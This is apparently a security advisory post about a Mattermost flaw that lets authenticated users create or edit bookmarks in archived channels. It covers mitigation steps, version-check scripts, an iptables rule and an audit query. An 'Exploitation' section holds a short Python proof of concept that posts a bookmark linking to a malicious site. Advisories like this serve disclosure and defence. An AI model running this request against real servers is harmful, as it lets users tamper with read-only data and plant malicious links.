Mattermost, Improper Access Control, CVE-2025-XXXX (Moderate)

Mattermost versions 10.4.x <= 10.4.2, 10.3.x <= 10.3.3, 9.11.x <= 9.11.8, and 10.5.x <= 10.5.0 contain a vulnerability where the system fails to enforce proper access controls on bookmark creation and updates in archived channels. This allows authenticated users to create or modify bookmarks in channels that have been archived, bypassing the intended restrictions. Archived channels are typically meant to be read-only, and this flaw undermines the integrity of the archiving feature. The issue arises due to insufficient validation checks when handling bookmark-related API requests for archived channels. This vulnerability could lead to unintended data modifications or misuse of archived content, potentially disrupting workflows or violating data governance policies.

DailyCVE Form:

Platform: Mattermost
Version: 10.4.0 – 10.4.2, 10.3.0 – 10.3.3, 9.11.0 – 9.11.8, 10.5.0
Vulnerability: Improper Access Control
Severity: Moderate
Date: Mar 21, 2025

What Undercode Says:

Exploitation:

1. Exploit Code:

import requests

url = "https://<mattermost-server>/api/v4/channels/<archived-channel-id>/bookmarks"
headers = {"Authorization": "Bearer <access-token>"}
payload = {"name": "Exploit Bookmark", "url": "https://malicious.site"}
response = requests.post(url, headers=headers, json=payload)
if response.status_code == 200:
    print("Bookmark created in archived channel!")
else:
    print("Exploit failed.")

2. Steps to Exploit:

  • Obtain an authenticated session token.
  • Identify an archived channel ID.
  • Use the API endpoint to create or update bookmarks in the archived channel.

Mitigation:

1. Update Mattermost:

Upgrade to patched versions: 10.4.3, 10.3.4, 9.11.9, or 10.5.1.

2. Temporary Workaround:

  • Disable bookmark functionality for archived channels via custom scripts or plugins.
  • Implement additional API request validation on the server side.

3. Detection:

  • Monitor API logs for unauthorized bookmark creation/updates in archived channels.
  • Use the following command to check for vulnerable versions (the pattern covers the affected ranges listed above; the closing quote keeps it from matching later patch releases such as 10.4.20):
    curl -s https://<mattermost-server>/api/v4/config/client | grep -E '"Version":"(10\.4\.[0-2]|10\.3\.[0-3]|9\.11\.[0-8]|10\.5\.0)"'

4. Protection Commands:

  • Restrict API access to archived channels:
    iptables -A INPUT -p tcp --dport 8065 -m string --string "/api/v4/channels/" --algo bm -j DROP
    Note that this rule matches every request path under /api/v4/channels/, not only archived channels, and the string match only inspects plaintext, so it does not apply to requests arriving over TLS.
  • Apply role-based access control (RBAC) to limit bookmark permissions.

5. Audit:

  • Review existing bookmarks in archived channels (table and column names below must be adapted to the actual schema of your deployment):
    SELECT * FROM bookmarks WHERE channel_id IN (SELECT id FROM channels WHERE archived = true);

6. Automated Patch Verification:

  • Use the following script to verify the patch (it matches the exact patched releases listed above, so later releases on these branches are reported as vulnerable and need a version comparison instead):
    #!/bin/bash
    VERSION=$(curl -s https://<mattermost-server>/api/v4/config/client | grep -oP '"Version":"\K[0-9.]+')
    if [[ "$VERSION" =~ ^(10\.4\.3|10\.3\.4|9\.11\.9|10\.5\.1)$ ]]; then
        echo "Mattermost is patched."
    else
        echo "Mattermost is vulnerable."
    fi
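The version checks above (the grep pattern in the Detection section and the exact-match script in this section) can be generalised to a proper per-branch range comparison, so that a release such as 10.4.4 is reported as fixed rather than vulnerable. The following is an added example, not code from the advisory or from Mattermost; it assumes, as the advisory's commands do, that the body of GET /api/v4/config/client carries the server version in a top-level "Version" field, and the sample response is constructed.

```python
import json

# Affected release ranges (inclusive) per release branch, taken from the
# version lists in the advisory above. The first fixed release on each branch
# is the one immediately after the range (10.4.3, 10.3.4, 9.11.9, 10.5.1).
# Branches not listed here are treated as outside the scope of this advisory.
AFFECTED = {
    (10, 4): ((10, 4, 0), (10, 4, 2)),
    (10, 3): ((10, 3, 0), (10, 3, 3)),
    (9, 11): ((9, 11, 0), (9, 11, 8)),
    (10, 5): ((10, 5, 0), (10, 5, 0)),
}


def parse_version(text):
    """Turn '10.4.2' or '10.4.2-rc1' into (10, 4, 2); reject anything else."""
    core = text.strip().split("-", 1)[0].split("+", 1)[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in parts)


def assess(version_text):
    """Classify a server version as 'affected', 'fixed' or 'not-listed'.

    Unlike an exact match against the four patched releases, any later
    release on an affected branch (for example 10.4.4) counts as fixed.
    """
    version = parse_version(version_text)
    branch = version[:2]
    if branch not in AFFECTED:
        return "not-listed"
    low, high = AFFECTED[branch]
    return "affected" if low <= version <= high else "fixed"


def assess_client_config(raw_json):
    """Run assess() on the JSON body returned by GET /api/v4/config/client.

    Assumption: the server version is in the top-level "Version" field.
    """
    return assess(json.loads(raw_json)["Version"])


# Constructed sample response; not captured from a real server.
SAMPLE_CLIENT_CONFIG = '{"SiteName":"example","Version":"10.4.2"}'

if __name__ == "__main__":
    print(assess_client_config(SAMPLE_CLIENT_CONFIG))  # affected
```

To check a live server, replace SAMPLE_CLIENT_CONFIG with the response body fetched from your own instance.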
    

By following these steps, organizations can mitigate the risk posed by this vulnerability and ensure the integrity of their Mattermost instance.

References:

Reported By: https://github.com/advisories/GHSA-rp74-x43m-cpw3